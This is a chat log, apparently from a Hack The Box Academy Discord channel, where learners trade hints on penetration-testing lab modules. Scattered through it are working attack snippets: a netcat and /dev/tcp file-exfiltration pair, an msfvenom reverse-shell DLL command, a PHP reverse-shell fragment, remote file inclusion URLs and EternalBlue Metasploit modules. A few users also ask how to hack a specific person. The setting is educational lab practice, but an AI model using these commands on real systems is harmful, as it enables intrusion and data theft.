#modules
I don't think so. It may take a few minutes. Try logging in and out.
windows fundamentals?
yes, i got the cubes. thank you for your response
Cool! Good Luck!
If it's windows fundamentals I may be able to help. DM me with the section and i'll do my best 🙂
Module and section are in the message
Thanks for replying 👍
@wind plaza pls be careful with spoilers...
Hi mate, any hint? I'm stuck too
Thank you. Already thought about that and tried to generate all tokens for all milliseconds one second past to one second after.
Maybe i made a mistake here. Will try again later.
in ntfs vs share permissions, first disable the rule for windows firewall or deactivate it. Then try mount command. If it doesn't show error but also doesn't show any results then add some kind of file in your shared folder so that it's not empty. If your shared folder is empty, then you won't see results as your folder is empty
Ok I need help with Password Attacks, Credential hunting in Linux. Just a nudge in the right direction please.
I have read the hint. Created password lists based on just the hint, used custom rules on the password.list file ran it against K and W and the whole username.list file and still nothing.
hint ||you can use the word in the hint with the custom rules to create a short wordlist||
I did that and still nothing
did you use that against user K (without cap k) and what service did you brute force?
ran against a list with K, k, W, and w. Tried SSH, SMB, winrm, ldap.
oh wait that's weird both ||ftp|| and ||ssh|| should work, i'm double checking right now and i don't see any winrm or ldap port
I dont see an ftp port open
without spoilers too much ||you are using the right username and if you use the short wordlist the password is in top 50||
Could I have a little bit of help with OSINT corporate recon?
In the "domain structure" section, it asks for a hosting provider. I did a whois. I am 99% sure my answer is right.
And in the "Email addresses" section I can't find the CEO's email. I have used TheHarvester and google dorks, but I still cannot find his email.
Hi, i need help with Pivoting, Tunneling, and Port Forwarding : Skills Assessment, so if someone has time, please DM me
@raven cairn DM me 🙂
hi
i don't remember the sql command to display the tables ?
i tried select * from [table] but it is not true
might need to put semicolon at the end ;
but it not that
Select * from <table> ;
but the flag does not appear
i just found sorry
Holy fuck, ping sweep from powershell shows different results than cmd ping sweep
hey i might be able to help
Hi, on the SMTP from the Footprinting module, in the second question they ask you to use a wordlist to enumerate users, I tried it with different tools but none of them could find the username, what am I doing wrong?
Under Resources you will find a Wordlist
Ah okay, I see it.
Remember that servers can take longer to respond.
Even though all the output gives no result
the hint talks something about the usernames, but I can't really understand it
Standard Query timeout is 5 sec
If the server takes longer to respond, you need to increase this value.
https://www.kali.org/tools/smtp-user-enum/
smtp-user-enum Usage Example Use the VRFY method (-M VRFY) to search for the specified user (-u root) on the target server (-t 192.168.1.25):
root@kali:~# smtp-user-enum -M VRFY -u root -t 192.168.1.25 Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan ...
Anyone able to assist in the File upload skills assessment. I feel a little lost at getting a foothold. Gathered a lot of information, that I just can't seem to put together the right way :/
Try to read the code of the PHP file.
I can't get it. Everything I throw at it just returns my code base64-encoded. None of it was actually processed on the backend :/
DM
Thank you :)
If I pay for let's say the "Silver" plan where I get 200 cubes each month, will these cubes be added to my account or will I have 200 cubes each month to spend? So will I have after 2 months 400 cubes (if I don't spend them) or just 200?
They add up
thank you
Anyone available to give me a nudge on File Upload Attacks - Type Filters?
Is the Academy just an entirely different signup than the HTB?
yes its a separate account from the main website
hi i'm blocked for trying to brute force with a password/login
i don't know what tools use ?
which
can someone give me some help on file upload attacks whitelist - I've successfully uploaded and tried 60 different name variations but I get 404 or permission denied when trying run commands.
dm me
hi can anyone help me with the easy lab footprinting ? i am stuck to finding the ssh key.
@rustic sage did you connect to ||the ftp? try looking for hidden files/folders :)||
@slow ruin DM me 🙂
Hey can anyone help me with starting point tier 1 (appointment) task 4? Im not sure where to find the classification name
viktus — Today at 7:57 AM
If ever, what error are you getting? I was able to get to this to work yesterday.
Some things to check:
- firewall settings of target are updated
- I'm not sure how critical, but "full control" for the Everyone group (ACE) in ACL for sharing
- To be cautious I also installed cifs-utils prior to mounting
Module-Network enum with NMAP / HOST discovery question
Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.
@cursive grove they are basically asking ||what a TTL of 128 means :)||
Is anyone available to help me with the footprinting module question on DNS? The final question is about finding the FQDN of the host where the last octet ends with "x.x.x.203". I've been on this for about 6 hours now and done literally everything I can think of with every single subdomain list on seclist and got absolutely nothing.
🙏 🙏 🙏
You need to find all the DNS zones
I'm now not sure I understand what a zone is...I've seen this response to previous questions, and I thought I understood at first but now I'm not sure. Can I dm?
Sure
Hi All, I have been stuck on Question 3 of Skills Assessment - Using Web Proxies for last 3 hours. Can someone guide me please?
Hey I am stuck in WordPress Skills Assessment. I can't figure out how to start, so feel free to give any hints to how I can proceed, either here or dm 🙂
find the wordpress site. Have a look at the source code of the website. Especially the links
did you solve the problem? i'm having the same issue, i found only three subdomains in the Attacking common services, dns section. then when i try to dig to any of them i can't find the flag. any hints?
I think I have checked about everything on the source code website, every link;|| index.html, about.html, services.html, gallery.html, error.html, contact.html||. Is it possible to get a deeper clue 😛
I think you missed a link.
What is Wordpress often used for?
If you get stuck, send me a DM
Try a zone transfer
i tried but with the subdomains i found it's not working
Ohh the blog ofc.. thanks! I will dm you if I get stuck again! 😄
Hi, I'm stuck in the Skills Assessment section of the Hacking WordPress module.
I've managed to answer all the questions except for Question 5: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.".
I have no idea what file/plugin they are referring to... Can I get a hint please?
Do a scan with wpscan incl. token. Then you should get vulnerable plugins displayed
Yes, got them all, I used the ||LFI vulnerability in Site Editor 1.1.1|| to answer question 6 and 7
how long does it usually take to spawn target in Active Directory Enumeration & Attacks module ?
DM
Can somebody help me with getting NTLM hash of bross user in Active Directory Enumeration & Attacks in Attacking Domain Trusts - Child -> Parent Trusts - from Linux chapter?
have you found a way? Stuck on the same problem.
Good morning everyone!!
Starting my morning with a red bull and cracking an sha512 hash.
hello all,
I just do not get on with File Inclusion and have already invested a lot of time, https://academy.hackthebox.com/module/23/section/1491 "Illegal path specified! "
can someone help me
well theres a filter stopping you from entering that url, try to bypass it 👽
I've been trying to do this for hours 😉
yeah ik m8 but that whole module is supposed to teach you how to bypass those filters
re-read the path truncation section.
the problem is that i do not get any error message on the website
thats good
😉
that means your url isn't being filtered out
Do you still need help on this?
Thanks, I have received help
i am on the the rfi page of the lfi module and i am wondering why index.php?language=http://0.0.0.0:8080/shell.php&cmd=id this url isn't working
Warning: include(http://0.0.0.0:8080/shell.php): failed to open stream: Connection refused in /var/www/html/index.php on line 47 Warning: include(): Failed opening 'http://0.0.0.0:8080/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 47 i get these two notable warnings
you must replace the 0.0.0.0 ip
no i can still connect to the server in my browser with 0.0.0.0
and the port
and get the php file
language=http://127.0.0.1:8080/shell.php&cmd=id still gives errors
the correct syntax is ? not &
language=http://127.0.0.1:8080/shell.php?cmd=id
have you tried your VPN IP address and started NC on 8080 first
i tried that and still get the same error
yes and my browser can't even connect
to the vpn ip
are you using a webshell or reverse shell?
webshell
Should be
Shell.php?&cmd=id
Could also try and change the name of your shell.php extension to be .txt
nope still doesn't work
Damn
Why dont you try using the default cmd web shells that kali linux comes with?
locate webshells | grep cmd
These are much simpler to serve
Since you dont need to add the cmd=
Or anything else
Other than the name of the file
i am using parrot security
@deep delta maybe you have a problem with how you had to set the reverse shell
yeah thats what im thinking i think its the apache server
because in my browser i can go to it
but not on the web page
@deep delta what if you set up a reverse shell using nc
@deep delta netcat
https://academy.hackthebox.com/module/23/section/254 if anyones done this section could you walk me through how to do it
if you follow along with the section you will get the answer
Hello, Im working through the Shells & payloads module and on the php web shells section. I keep getting WARNING: Failed to daemonise. This is quite common and not fatal.(111). Not sure what i'm doing wrong here would anyone be able to help me please?
stuck on privileged groups linux privilege escalation exercise
/module/51/section/477
cool name. i met the guy Benoit when he worked for Battelle in Cambridge, MA a long time ago.
Really? That's really cool
wise words XD
Anyone got some advice on footprinting IMAPs and POP2
POP3*
I dont really get what one would get out enumerating them other than mass spamming emails. I also couldn’t figure out how to use commands within the IMAPs server once connecting. I tried selecting a mailbox to look at the messages inside but I just kept getting bad IMAPs command error
the imap server u gotta preface them with a character i forgot what it is but i think it's a
if you're connecting raw
type ahelp
A1 yup
I connected to the IMAPs using OpenSSL
And the POP3 server I used OpenSSL as well. I tried enumerating the IMAPs server with curl
But it didnt really tell me the admin email
what are u on send the link
hope it isnt too much trouble btw, thanks for the help
which question are u on
the one asking for the admin address and access the IMAP server emails
ahh yesa
Thanks!
havent done that but what part are u stuck in?
it's just 1 question
"Use the privileged group rights of the secaudit user to locate a flag."
in the /var/log?
look for all directories where u have group permission read access
and recursively list their files
Hey all apologies in advance for the noob question but i'm stuck on the priv esc portion of "knowledge check". I tried sudo -l but can't access the file. I'm new to priv esc so any help would be appreciated.
also the directory listed when i type sudo -l doesn't exist, and I can't make it.
u mean skill assessment ?
this module is what i'm on
linux priv esc module ?
hi i'm on the "pivoting" room on the "Remote/Reverse Port Forwarding with SSH" part. I tried to apply what i learned in this section without success. i got the .exe on the windows machine, i used this command to make the windows communicate with my kali :
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN
The msfconsole doesn't get the shell but the ssh command tells me :
pff lets give serverside attacks assessment a new try
how is it possible that i cant complete it:(
took me 3 hours to complete another module before i thought of trying admin:admin
how i hack somebody
Hi guys, i think the module https://academy.hackthebox.com/module/35/section/224 bugged
at POST section
the answer is []
i tried many times, even followed a tutorial 1:1
if anyone could check it for me I would be thankful
it's about getting cookie session to log into a search.php of a flag
Well start learning
u can do it here on htb or go and join anonops then #learninghub
they have also a lot of stuff
depends on what u want
then i would start with htb academy
I asked the same question a few days ago, you have to use your own browser
what does that mean
Instead of using the pwnbox, setup your own VM or use your own browser
I'd suggest creating your own VM as it is easier
i aint using pwnbox, i use cmd or a browser
most of the time both
but I am alright with knowing that there are some problems with this section, and that wasn't really my fault
so thank you 🙂
does it need a good computer to run smoothly?
The section is possible, I finished just it yesterday - make sure to precisely follow the guide
doesn't really matter afaik
good, ill try to do it on a laptop then
and you need to search for the flag
yea i did i precisely
If you're still struggling you can also DM me
what are you using to type the commands? i am just using a basic windows10 command line
okay ill dm you not to spam
I setup a ParrotOS VM myself
can someone please answer me a question about server side attack assessment
if the answer is no ok i move forward
ername wordlist
fuck
If possible, I need a nudge on SQLMap Essentials. For Case #10, I keep getting POST Parameter 'id' might not be injectable and I am not understanding why
@vale salmon DM me 🙂
congrats!
tnx:)
Some say, "work smarter, not harder."

Hello, is this the best place to ask for a hint on an HTB academy module?
I'm working through Getting Started (https://academy.hackthebox.com/module/details/77) and am stuck on the solution for page 9. I think I'm on the right path, I'm just missing something.
Sure is!
So far, I have already done
||msfconsole
use scanner/http/wp_simple_backup_file_read
set RHOSTS (ip)
set RPORT (port)
run||
I can see the output that metasploit returned
||/home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt||
I've also found
||(ip:port)/wp-admin||
I just can't seem to figure out how to use a ||username & password against wp-admin||, since the information in the txt shows ||encrypted passwords||
what is the subject? Priv Esc?
The subject of the page is Public Exploits. The question at the bottom reads
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
It's basically an introduction in how to find exploits, and configure/run them against web servers
Ok, I've gone back to remind myself of this one - I wasn't taking good notes back then so I had to re-do it.
You've solved it already. Make sure you have set the FILEPATH in MSF properly to what you're looking for. Then go in and read the file that has been written to your machine at the location listed (i.e. /home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt)
So the exploit is reading the specified file on the web server (as per what you put into metasploit), and then writes it out to a file on your local machine.
So filepath should look something like
||set filepath /flag.txt||?
Ah! Finally!!!
Thank you so much, @manic ermine! I knew I was close, I was just like "WHAT AM I MISSING HERE!?" 😆
Alright, I'm out for now. That has been bugging me for a few hours. I'll pop back in if I have more issues. Thanks again, @manic ermine 😄
NP - trust me, that is an experience you'll get VERY used to as you work through the academy. I'm only one course away from finishing the Pen Tester path and it's taken me many months haha.
Oh dang, looking to complete that myself. Excited for you, dude! 😄
im doing the metasploit module now🤣
me too
I found that I can't pwn the machine with my own computer with vpn, I can only gain access when I use pwnbox, how about you?
I use openvpn
can you create session successfully
I dont know if it is a big problem or just use pwnbox in this module
FTR if anyone else gets stuck on this, you need to use impacket’s secretsdump.
Can anyone assist with this issue of mine? I'm in the "WEB REQUESTS" mod and at the end answering the question to "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'" to which I've acquired the cookies to the site the Target took me to and ran the following code in the terminal "curl -X POST -d 'username=admin&password=admin' -b 'PHPSESSID=scl9tv8j6heti8hobegvasghio' -H 'Content-Type:application/JSON' http://178.62.115.160:30959/search.php" and I'm met with "Received content contained invalid JSON!" please no answers just guidance to something I may be missing or a push in the right direction #WebRequests
I know it's has to be with something with the Header or the flags I'm using but missing something and it just not clicking with me.
first if you got the "session cookie" you don't need the cred for this and also you didn't "search for the flag"
try with some of the example under ||JSON Data|| in that section
Getting somewhere now thank you, "The requested URL was not found on this server" I have been having issues with the Target ip stop working after being on it for bout an hour might you know if this could be the case? refreshing takes a min so I dont want to unless I have to
your target box are just out of time, just spawn a new one this is a docker container so it's going to take like 2 second
Yeah just did it and sure enough it did only take 2 sec
Got it, just a bunch of syntax errors, had the right idea the whole time. Thanks again MRtom
Windows Privilege Escalation -SeDebugPrivilege
Did everything work for you the first time? Or did you need to Enable status to "debug programs"?
Hi, in the Intro to Network Traffic Analysis (module 81 section 787) what format am I expected to answer the question "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" I tried ||80 1030|| but that didn't work.
I understood what needs to be done manually using the task manager.
but problem repeated
Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]
I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]
Am I missing something silly here!? [I am a noob by the way!]
Hi everyone , im stuck in module Broken Authentication - Bruteforcing Passwords , i thought i found the password policy include at|| least 3 characters including uppercase , lowercase , and numbers|| , i did a filter for matching characters in the list from rockyou-50.txt but no which password is correct, where did i go wrong?
I use the grep command as follows:
grep '[[:upper:]]' /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '^.{0.12}$'
||Password1
Princess1
P@ssw0rd
Passw0rd
Jesus1||
It turns out that this error is due to the fact that I made the dump on the x64 system, and Mimikatz launched x86
hello
hi
is htb academy free?
@oak sigil yes
ah nice, thank you
@oak sigil but some modules you need to pay
would you be able to tell me which these are?
@oak sigil You will find out if you have access to academy hackthebox
You are not using the correct password policy, try with the table the academy provides you to test
Module : Using Metasploit Framework
Sub : Sessions
can anyone help with the final question for this? I have run the ||local exploit suggester||, and tried ||exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec||, ||exploit/linux/local/pkexec|| and ||exploit/linux/local/su_login|| to no avail. It says "target appears to be vulnerable" and "exploit completed, but no session was created". p.s. i have confirmed I've correctly set LHOST.
I have used the table, and found that the password is at least 3 characters long, including 3 types of characters uppercase, lowercase, number
Keep trying, there is something you are missing
did u get any answers ? i get the same error. i tried to scp the library but still getting errors
which question is this?
It's the one in the "sessions and jobs" page
the one with vulnerable sudo?
@iron plaza yeah, that's the one
instead of using the local exploit suggester ... search for an exploit related to sudo
@iron plaza, hmm ok, so none of the ones I mentioned are correct then?
don't know what else was in your suggested list but the ones you mentioned are not it
Oh, ok, awesome, thank you @iron plaza
If this command is not working check the syntax. If the syntax is correct yet the command is still working
is still (not) working i guess
Hi, I am having troubles with Web Service & API Attacks - Skills Assessment. I can not even craft a login request that is accepted. Please DM me
u can dm if u want
does anyone have had this error on the pivoting module "RDP and SOCKS Tunneling with SocksOverRDP" section
Does anyone know if there exist a module in the Academy to work on Python scripting skills ? I feel like it is becoming almost a must to script in Python for many positions on the market :/
Thanks for the link ! It seems to be pretty light when it comes to scripting & security. I guess the module is there to mainly introduce the language to the people who are not familiar with programming. I believe this module is the only one ?
Yes, that's all there is at the moment.
Hello i am stuck in /module/23/section/513
i tried many things it taught me, but i failed. Can anyone push me in the right direction
on the pivot module the last part (full windows)
I get errors all the time. like, the dll is seen as suspicious so windows deletes it.
I can't even connect to the other machine using mstsc
any guess ?
https://academy.hackthebox.com/module/23/section/254 i asked this yesterday but still after another hour today i am still stuck on the same page: ive read through the whole thing many times but i still don't understand why this link: index.php?language=http://127.0.0.1:80/shell.php&cmd=id won't give me rfi?
thats the local ip
yeah ik
try hosting a http server and put your own ip
You need to disable Defender first
im stuck in the same module the final one is hard
seems down to me isn't it ?
ive tried my vms own ip but it still can't connect
If the DLL is automatically deleted, then something is still active.
mmhh ok i'll try to find what
try tun0
dont forget the port
doesn't show when i run ifconfig
Check this
Settings > Windows Security > Virus & threat protection > Virus & threat protection settings > Real-time protection
connect to the academy vpn and try ip a
yes
yeah there was indeed one last option on 🥲 😅
The firewall (your printscreen) does not delete files. Antivirus on the other hand does 😉
@naive pelican thanks m8, i didn't realise the problem was that small 😄
What is Module 23, Section 513?
Please say the name of the module, it's easier.
file inclusion
im stuck on skills assessment
Did you have a close look at the source code of the index.php file?
||i found ?page=, when i fuzz this to try to read /etc/passwd with LFI-jhaddix.txt i had no luck||
You are in the right place, but the file you want to read is not helping you. ||Read the code of the index.php ||
can anyone help me?, I found 4 passwords that match the password policy, but failed to login
i know what to do next thank you
There are more passwords that would fit. The password you are looking for is not in your list.
so I'm not using regex + grep correctly?
i think so
You can DM me your command and I'll take a look.
so can you suggest me the correct grep for this question?
thanks ❤️
Reposting this, if someone can help, thanks in advance!:
Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]
I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]
Am I missing something silly here!? [I am a noob by the way!]
@wraith sapphire i was able to solve it using ||nmap -A (look at how it fingerprints the SSH service, it should reveal a specific linux distro.)||
Need help with the shells and payloads module, the skills assessment in the tomcat part, I have done this like two times, but with the nomachine connection I can't properly see and don't know if I'm missing something
will try this, I got the specific linux distro when I used this: sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5
But HTB says my answer is incorrect! But let me try what you told me, also, can you help me with what am I getting wrong in my commands? I am not sure why they are not working
Which question are you stuck on?
can I dm you?
sure
Someone available to help me in lfi assessment task?
Where exactly are you stuck?
In the final step to read the flag
i connected to hackthebox academy vpn on a vm and now i can't use commands and whenever i press ctrl+c it disconnects from vpn
ignore the white discord theme ;-;
With ctrl + c you cancel the current command and close the VPN connection. This is normal.
What exactly are you trying to do?
i'm trying to connect to hackthebox academy vpn
i ran the command openvpn academy-regular.ovpn and it worked the problem is that now i can't execute commands
Leave this window as it is and open a second shell
do not use your main OS for connecting to the VPN
this is a recommendation
next recommendation would be to choose a OS, ubuntu, kali or parrot to use it as a virtual machine
if its WSL, feel free to use tmux to manage multiple screens/terminals
This module could be helpful for you
https://academy.hackthebox.com/module/details/87
hello anyone who has completed the File Upload Module?
Anyone able to provide a hint on the knowledge check portion of the nibbles box for the Cracking into Hack the Box module? I am at the last exercise with the 2 questions. I am struggling to understand where i should look for a password for the get-simple admin login, any clues would be most appreciated!
plenty of walkthroughs on that, use your favorite search engine
Ah. Okay, thanks anyway
any difference with these multiplexers than the ones already built into the terminals of parrot/kali?
does Password Attacks take much time? Or with the correct wordlist just a few seconds? I'm just in the first section and spent like 15 minutes brute forcing
Windows Privilege Escalation Print Operators Tools doesn't include UACMe repo or binaries.
Could I get some nudge on it, please?
@radiant dagger i might be able to help
is there anything here on reverse engineering wireless data I am trying to learn that since I am a TSCM professional I need to do Signal Intelligence.
there's some academy modules on reverse engineering binary code, and a few reverse engineering windows exes and stuff. If you mean simply monitoring wireless packets and seeing how they are structured and what they contain, that's more like network traffic analysis, there's a module on that and plenty of material about wireshark, tcpdump
might want to search for tutorials on kismet as this is an open source program designed to do signals intelligence
no this is more military grade signals such as a UWB Comb signal that can penetrate the earth or anything
ground penetrating radar specifically that generates pressure waves
trying to do sigint on the data inside it
man ya sounds like some deep stuff, don't think they go over military style signals int and electronic warfare specifically here on hack the box. Though a lot of the stuff learned here can transfer over.
hmm wont let me upload a image of the signal
if anyone thinks they can get the audio out of the IQ data let me know DM me.
kind of what I do is analyze wireless data and demodulate it to make sense of it
Think you can do image upload but only in a one on one chat
Need a nudge on File Upload Attacks - Limited File Uploads. Crafted the ||XXE exploit|| then uploaded the exploit went to the directory of where it was uploaded and viewed the source but got nothing. The page says XML file does not appear to have any style information associated with it.
nvm got the flag!
What would be the best way to download a file locally to my attackbox, while ssh'd into a machine with escalated privileges?
I ended up just cat'ing a file, copy and pasting the text locally, but I feel like there's a more obvious way to do it.
Sources online were talking about doing something like scp -P (port) username@(ip):/file/location /local/dir but I had to escalate from one account to another in order to read the file, so that doesn't really apply. Is there a different command I should be using?
if you are talking about retrieving a file:
on your machine: nc -nlvp PORT > file
on the target: cat file > /dev/tcp/IP/PORT
We are currently investigating an intermittent issue with spawning the workstation on Academy.
^ A fix has been pushed, if you are experiencing the issue, please try respawning the workstation.
Hi i'm having some problems in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section because after i pivot successfully to the target and i scan it with nmap i only found port 22 and 80 opened and i don't understand how to connect to rdp. any hints?
i've the same problem can i dm you
proc_open('sh', array(0=>$sock, 1=>$sock), $pipes)
hello can someone please explain what the array and $pipes is doing in this shell
ldd --version
Maybe this
https://www.youtube.com/watch?v=7utwZYKweho
or this
https://www.youtube.com/watch?v=mRMmlo_Uqcs&list=PLIhvC56v63ILPDA2DQBv0IKzqsWTZxCkp
Those are both excellent sources.
Thanks a lot
on windows priv esc "DnsAdmins" part, i manage to get my user in the DnsAdmins but can't access the flag. Some people on the serv said we need a reverse shell but what is wrong in my reverse shell creation ?
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll -o shell.dll
The hint says It is in this form: HTB{...}
you missed a character
Oh, which one ?
after you run the code thru prettier, take the output and run it thru jsnice
Please don't post flags even if incomplete
Sorry
@candid sandal feel free to DM me
I followed the steps you mentioned and I found the missing character. I initially thought that the purpose was just to find the flag in the sources, but it seems that it required using some tools (not mentioned in the lesson) to find the correct flag to submit
Hi, if I want to fuzz two parameters in Intruder of Burp, like this:
id=1&pass=a,
id=2&pass=b,
id=3&pass=c, and so on, how can I set the payload?
Thanks
I just used the two sources the module mentioned to deobfuscate and got the answer.
you're right, I never look at the cheat sheet
can I get a sanity check on Password Attacks? On the section Linux Local Password Attacks/Passwd, Shadow, & Opasswd. I have grabbed the files, created the unshadowed file, and ran it against rockyou with hashcat but found no passwords. I am pretty sure 1800 is the correct setting. What am I doing wrong?
Feel free to DM me
Thanks for your help.
@lethal atlas can I dm about file upload attacks - file type ?
of course.
File Inclusion - Automated Scanning - I think this section is broken. When you follow the tutorial step by step it doesn't work
Can I have sanity check on Shells and payloads - "The live engagement"?
Skills assessment should be pretty easy but my reverse shells aren't working
DM me
Can someone help me with "File Inclusion - Automated Scanning"?
@half cave DM me 🙂
Where exactly do you need help? What have you already tried?
Oh, @west canopy was faster
Anyone able to help me out with file upload attacks skills assessment?
feel free to dm me
hi im block for a question help please
With which module do you need help?
responder
Maybe you ask here:
https://discord.com/channels/473760315293696010/691583669374025802
Hi guys! i need help with lab medium of footprinting module. I don't understand how to change to administrator user
feel free to DM me
ok!
Can you accept me pls?
Hi i want to skip google access if you have idea or way dm i will buyed not problem
could i get a bit of help with the linux fundamentals module, for example it asked me for the kernel version which i did uname -v for and the value i get is apparently not the right answer; pretty much everything is not the right answer, is this module broken?
try -r instead of -v
still not
I dont think its broken.
I agree. Not broken
@hollow pike did you SSH into the target and then run the command?
oh about that, thank u for the reply but yeah, i messed up on that part, already got guided tho, turns out i was doing these commands on pwnbox not the target, still appreciate the response
I am still stuck on the knowledge check for the final part of Cracking into Hack the box, I tried to escalate privileges on the target but it returned an error, is there something other than LinEnum.sh i need to use for this?
been a while so might not be remembering correctly I thought you ssh into that target. Create ssh keys on your own attack machine copy them over to victim machines ssh folder. Then you can ssh to the target and the account you will be on has root access.
The cheat sheet too contains some of the commands you would need to escalate privileges and the folder you need to put your ssh keys in
this is exploiting a permissions misconfiguration of the ssh folder of the root account on the victim machines which allows any user to write to the folder thus you can input your own keys into it and ssh into the target machine as root.
the lesson starts you off working your way into a machine where you exploit a code execution vulnerability
you upload a .php code to trigger a reverse shell connection into an image upload
i have no clue about any ssh or the likes yet
all of that i did without issue, but then moving on into the knowledge check i was able to replicate the same sort of action through the themes edit page on the next target
just by putting the reverse shell code into the themes edit field, then visiting that page executes the reverse shell
but this environment is behaving as if the LinEnum.sh script didnt REALLY escalate my privileges or something
even though I did eventually get it to allow it
but once i cd to the /home directory, its still giving me a hard deny and sudo spits out how a terminal is required to read password
definitely learn a little more about ssh, its very common use in I.T. basically just allows you to access another computer remotely and interact with it through a terminal window.
Yeah thats not exactly what I meant by that, I was just saying i was under the impression that the lesson knowledge check would follow the same formula. Not have me go off trying to do something i have only ever even done in a networking class a year ago.
Thats all im saying haha
That's the charm and bane of hack the box: some of the lessons will kind of go off the beaten path. They want you to do your own research and get help from others too, as a lot of times in pentesting and cyber security scenarios you'll constantly run into novel situations and will need to do your own research.
Better to learn the hard way than the easy way
All right, fair enough
I've been working on the skills assessment on the shells and payloads section for 6 hours today. I'm F'ing done with it man
could I have another sanity check please
Having issues with exploiting eternal blue
This is me right now ^^^^

theres a metasploit module that automates eternal blue exploitation could try that
I have been trying the metasploit module.
gave you the general solution already but if you need more help you can DM me
well another common troubleshooting step is if you're using your own VM why not try it inside the pwnbox see if you get different results
I have also been using it in pwnbox 😢
I have been changing the payload to and that hasn't been working either
theres a couple of eternal blue modules in metasploit maybe try a different one
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
I haven't done the shell/payloads module yet specifically so don't know much else to help you. Only done a few boxes that utilized eternal blue exploitation and the metasploit modules always worked for me.
don't know much about the machine you're doing, you sure it's vulnerable to eternal blue? Could run a nmap script that checks for it
nmap --script=smb-vuln* <target ip>
HOLY FUCK
I GOT IT
WHAT THE FUCKING FUCK
I HAD THE WRONG LHOST
AFTER 6 HOURS
OH MY GOD!!!
rofl
Thank you for advice
well glad you got it
My vs code stopped working, actually I can write codes in it but it can't run them, I have to open the python file with shell to run it can anybody help?
Hi everyone,
Requesting help on Nmap module: Hard lab
Honestly, I didn't understand the question on what service version are we expected to find, I ran Nmap along with version scans and found SSH and HTTP port open along with their version, but thats not the correct answer. Hint talks about customer wanting large amounts of data(I initially thought about FTP!!) but then only HTTP and SSH is open.
Can someone give me a clue on what needs to be done here? Is there some flag that I need to find?
[P.S: Complete Noob here!!]
@wraith sapphire DM me 🙂
Is somebody available to help me get the double pivot working to MGMT01 on Attacking Enterprise Networks module (post exploit section). The handler on my host doesn't catch DC01 payload even though everything is set up ok.
@manic ermine i might be able to help !
Amazing, can I DM?
sure 🙂
Hi, everyone requesting help for Broken authentication predictable reset token. I modified the script to make it the admin user, concatenated the user and time together, and md5 the combined string value and brute forced with the time differences included but still no hit. Cant seem to figure it out any help is appreciated thanks.
i've the same problem how you solved it?
yes but dont exactly remember how i solved it
Because i do everything that is written in the module and the connection to the rpivot server is but when i use proxychains to search the page there is an infinite loading
now i'm getting this strange output when getting a shell (windows PE, dns part) :
anyone knows why is this happening ?
ls
i get the same error on skill assessment 1 when i try to execute my uploaded shell
Active Directory Enumeration & Attacks / Bleeding Edge Vulnerabilities. Any one to DM for help?
hello guys
i am new into hacking
i really would appreciate if i get help
because i really want some help
cuz i like hacking very much
THANKS !!
i know a bit of coding and made few projects
it was a little intro by me
👍 👍
Question on "Communication with Processes" windows priv escalation module
What is the correct format on the answer for the question "Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?"
I was able to locate the pipe information using accesschk, but none of the answers are being accepted. Anyone around for a nudge? I've got my screenshot ready to show I'm not just looking for the answer without prior work put in
im stuck at this
Disregard, if anyone comes across this confused as i was, the whole service name needs to be entered (ie NT SERVICE longservicename)
which module?
targets not being recognized?
google?
ye
did you just come here to try to get someone's ip?
which module are you in then?
try connect with smbclient?
yep
hmm, let me see if i've done that module already, hang tight
also tried with -N and -L
i just saw a google search that first step to hack someone is to get his/her ip
thats why i asked
sorry if it is against the rules
even if you get their ip you need to know what to do next
also if you dont "hide" your ip they will know the connection came from you
https://academy.hackthebox.com/ you do this you learn
by reverseshell right
by reverseshell right?
did you already bruteforce bobs password?
maybe
If i remember right, had to run hydra to get the weak password bob uses
guys which tools to use for hacking
what module is that? Password attacks?
